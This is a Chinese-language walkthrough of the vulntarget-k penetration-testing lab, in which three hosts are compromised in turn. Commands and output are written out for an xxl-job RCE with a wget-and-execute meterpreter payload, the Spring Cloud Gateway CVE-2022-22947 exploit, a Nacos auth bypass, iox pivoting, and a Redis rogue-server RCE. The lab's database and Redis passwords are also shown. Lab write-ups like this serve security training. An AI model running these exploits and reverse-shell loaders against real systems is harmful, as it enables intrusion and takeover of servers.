vulntarget-k - 内网渗透

标签

xxl-job rce

Spring-Cloud-CVE-2022-22947

nacos auth bypass

iox

靶机难度比较简单，都是用用 exp 就好了

拓扑图

网卡设置

首先需要使用虚拟网络编辑器，增加 VMnet1、VMnet2、VMnet3

对三张网卡设置子网 IP

VMnet1
192.168.100.0
VMnet2
192.168.88.0
VMnet3
10.30.7.106

如遇到不能启动虚拟机，将靶机名字.vmx，如 xxl-job.vmx 文件第四行更改

更改 xxl-job 虚拟机网卡，将桥接改为 VMnet3

攻击机 kali 也需要将桥接改为 VMnet3

当靶机全都开起来以后，可以做个快照，这样出问题就可以直接恢复快照了

Recon

对目标 10.30.7.106 做端口扫描，结果如下

PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
9999/tcp open  abyss

其中，访问 8080、8081 端口显示 404，目录扫描无结果

当访问 9999 端口时候，显示 {"code":500,"msg":"invalid request, HttpMethod not support."}

扫描目录也没有结果

所以能看到的信息只有这样一句话{"code":500,"msg":"invalid request, HttpMethod not support."} ，搜索得到

xxl-job

漏洞利用

获取 meterpreter shell

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.30.7.128 LPORT=1234 --platform linux -f elf -o xxl

python 开启临时 http 服务用于传输木马

python3 -m http.server 80

开启监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run

使用 burp 发送下面的数据包

POST /run HTTP/1.1
Host: 10.30.7.106:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 393{"jobId": 1,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "wget 10.30.7.128/xxl -O /tmp/.xxl;chmod +x /tmp/.xxl;/tmp/.xxl","glueUpdatetime": 1586699003758,"broadcastIndex": 0,"broadcastTotal": 0}

得到 shell，权限为 root

meterpreter > shell
Process 1572 created.
Channel 1 created.
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:c6:13:b0 brd ff:ff:ff:ff:ff:ffinet 10.30.7.106/21 brd 10.30.7.255 scope global ens33valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fec6:13b0/64 scope link valid_lft forever preferred_lft forever
3: ens37: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:c6:13:ba brd ff:ff:ff:ff:ff:ffinet 192.168.100.20/24 brd 192.168.100.255 scope global ens37valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fec6:13ba/64 scope link valid_lft forever preferred_lft forever
whoami
root

此处可以看到目标靶机为双网卡，还有另一个网段

接下来做 socks 代理，搜集内网存活主机

spring-cloud-geteway

横向移动

主机发现

for k in $( seq 1 255);do ping -c 1 192.168.100.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

得到

192.168.100.50

socks 代理

1、kali 使用 python 开启临时 http 服务

python3 -m http.server 80

2、kali 开启监听

./iox proxy -l 9991 -l 1080

3、将 iox 下载至入口机

wget 10.30.7.128/iox
chmod +x iox
./iox proxy -r 10.30.7.128:9991 &

完成 socks 代理搭建

对 100.50 使用 fscan 扫描

得到漏洞信息

proxychains4 ./fscan_amd64 -h 192.168.100.50 -socks5 127.0.0.1:1080
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.2
Socks5Proxy: socks5://127.0.0.1:1080
start infoscan
192.168.100.50:8848 open
192.168.100.50:8800 open
192.168.100.50:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://192.168.100.50:8848 code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle: http://192.168.100.50:8800 code:503 len:292    title:None
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos 
[+] http://192.168.100.50:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] http://192.168.100.50:8800 Spring-Cloud-CVE-2022-22947 
[+] http://192.168.100.50:8800 poc-yaml-spring-actuator-heapdump-file 
[+] http://192.168.100.50:8800 poc-yaml-springboot-env-unauth spring2
已完成 3/3
[*] 扫描结束,耗时: 16.92195982s

漏洞利用移动至 100.50

从扫描结果可以发现，100.50 只开放了 2 个端口，且两个端口都有漏洞

在 github 找到 Spring-Cloud-CVE-2022-22947 漏洞利用脚本

验证

proxychains4 python3 22947.py http://192.168.100.50:8800
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16___ _ __  _ __(_)_ __   __ _        ___| | ___  _   _  __| |      ___  __ _ 
/ __| '_ \| '__| | '_ \ / _` |_____ / __| |/ _ \| | | |/ _` |_____/ __|/ _` |
\__ \ |_) | |  | | | | | (_| |_____| (__| | (_) | |_| | (_| |_____\__ \ (_| |
|___/ .__/|_|  |_|_| |_|\__, |      \___|_|\___/ \__,_|\__,_|     |___/\__, ||_|                 |___/                                             |_|_ ____   ____ _____ ___| |  _ \ / ___| ____|/ _ \ | |_) | |   |  _|  
|  __/ |  _ <| |___| |___ \___|_|_| \_\____|_____|Usage: python3 CVE-2022-22947.py url
(If you want to get the reverse shell,please input: shell)Please input your commond: id
---------------------------------------
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK
The commond result is : Result = 'uid=0(root) gid=0(root) groups=0(root)']

命令执行有回显

接下来获取 shell

Spring-Cloud-CVE-2022-22947 获取 meterpreter 会话

由于 100.50 和 3.x 网端是不通的，所以需要在入口机器 xxl-job 做端口转发，且生成的木马需要传输至 xxl-job

1、在 xxl-job 中使用 iox 开启端口转发

./iox fwd -l 2211 -r 10.30.7.128:1235 &

2、生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp  LHOST=192.168.100.20 LPORT=2211 --platform linux -f elf -o springcloud-re-2211

3、下载木马至入口机器 xxl-job

wget 10.30.7.128/springcloud-re-2211
--2023-01-11 06:35:13--  http://10.30.7.128/springcloud-re-2211
Connecting to 10.30.7.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'springcloud-re-2211'0K                                                       100% 43.5M=0s2023-01-11 06:35:13 (43.5 MB/s) - 'springcloud-re-2211' saved [250/250]python3 -m http.server 1337
exit
meterpreter > bg
[*] Backgrounding session 1...

4、开启监听

[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set LPORT 1235
LPORT => 1235
msf6 exploit(multi/handler) > run

5、运行 exp

proxychains4 python3 22947.py http://192.168.100.50:8800
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16___ _ __  _ __(_)_ __   __ _        ___| | ___  _   _  __| |      ___  __ _ 
/ __| '_ \| '__| | '_ \ / _` |_____ / __| |/ _ \| | | |/ _` |_____/ __|/ _` |
\__ \ |_) | |  | | | | | (_| |_____| (__| | (_) | |_| | (_| |_____\__ \ (_| |
|___/ .__/|_|  |_|_| |_|\__, |      \___|_|\___/ \__,_|\__,_|     |___/\__, ||_|                 |___/                                             |_|_ ____   ____ _____ ___| |  _ \ / ___| ____|/ _ \ | |_) | |   |  _|  
|  __/ |  _ <| |___| |___ \___|_|_| \_\____|_____|Usage: python3 CVE-2022-22947.py url
(If you want to get the reverse shell,please input: shell)Please input your commond: shell
---------------------------------------
Please input your commond for reverse shell , such as ("bash -i >& /dev/tcp/192.168.190.177/5000 0>&1"): 
wget 192.168.100.20:1337/springcloud-re-2211 -O /tmp/.springcloud-re-2211;chmod +x /tmp/.springcloud-re-2211;/tmp/.springcloud-re-2211
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8800  ...  OK

6、得到 springcloud 主机 shell

rumsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.30.7.128:1235 
[*] Sending stage (3045348 bytes) to 10.30.7.106
[*] Meterpreter session 2 opened (10.30.7.128:1235 -> 10.30.7.106:39446) at 2023-01-11 01:36:09 -0500meterpreter > shell
Process 2199 created.
Channel 1 created.
whoami && ip a
root
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:8c:96:21 brd ff:ff:ff:ff:ff:ffinet 192.168.100.50/24 brd 192.168.100.255 scope global ens33valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fe8c:9621/64 scope link valid_lft forever preferred_lft forever
3: ens37: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:8c:96:2b brd ff:ff:ff:ff:ff:ffinet 192.168.88.60/24 brd 192.168.88.255 scope global ens37valid_lft forever preferred_lft foreverinet6 fe80::20c:29ff:fe8c:962b/64 scope link valid_lft forever preferred_lft forever

8848 nacos 未授权

通过 fscan 的漏洞扫描结果，可以看到 8848 端口还开着一个网站，且有公开漏洞

利用步骤

1、使用 curl 发 POST 请求

proxychains4 curl -X POST http://192.168.100.50:8848/nacos/v1/auth/users\?username=test\&password=test
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.50:8848  ...  OK
{"code":200,"message":"create user ok!","data":null}

2、通过网页登录，测试成功

在 admin-api、redis-task 中得到一些凭据

spring:datasource:druid:url: jdbc:log4jdbc:mysql://127.0.0.1:3306/admin?serverTimezone=Asia/Shanghai&characterEncoding=utf8&useSSL=falseusername: rootpassword: Pabc@234%!redis:host: 0.0.0.0password: nbsg@123456port: 6379databases: 0,1,2,3,4,5,6,7timeout: 60000

三层代理

对 100.50 的利用以及差不多了，接下来移动至 88.x 段

for k in $( seq 1 255);do ping -c 1 192.168.88.$k|grep "ttl"|awk -F "[ :]+" '{print $4}'; done

得到 192.168.88.70

socks 代理

# kali
./iox proxy -l 9992 -l 10801
# xxl-job
./iox fwd -l 9992 -r 10.30.7.128:9992
# springcloud
./iox proxy -r 192.168.100.20:9992

redis

proxychains4 python3 redis-rce.py -r 192.168.88.70  -L 10.30.7.128 -f module.so -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16█▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
█  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
█▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
█  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   ▀                                     ▀                   [*] Connecting to  192.168.88.70:6379...
[proxychains] Strict chain  ...  127.0.0.1:10801  ...  192.168.88.70:6379  ...  OK
[*] Sending SLAVEOF command to server
[+] Accepted connection from 127.0.0.1:10801
[*] Setting filename
[+] Accepted connection from 127.0.0.1:10801
[*] Start listening on 10.30.7.128:21000
[*] Tring to run payload
[-] Error: timed out, exit
[*] Clean up..

由于网段不通，还需要做端口转发

# springcloudgeteway 
./iox fwd -l 21000 -r 192.168.100.20:8882
# xxl-job
./iox fwd -l 8882 -r 10.30.7.128:21000

再次运行 redis-rce.py

proxychains4 python3 redis-rce.py -r 192.168.88.70  -L 192.168.88.60 -P 21000  -f module.so -a "nbsg@123456"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16█▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
█  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
█▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
█  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   ▀                                     ▀                   [*] Connecting to  192.168.88.70:6379...
[proxychains] Strict chain  ...  127.0.0.1:10801  ...  192.168.88.70:6379  ...  OK
[*] Sending SLAVEOF command to server
[+] Accepted connection from 127.0.0.1:10801
[*] Setting filename
[+] Accepted connection from 127.0.0.1:10801
[*] Start listening on 192.168.88.60:21000
[*] Tring to run payload
[+] Accepted connection from 10.30.7.106:40740
[*] Closing rogue server...[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ cat /root/flag
flag{good_redis}

至此完成靶机渗透，得到三台机器 root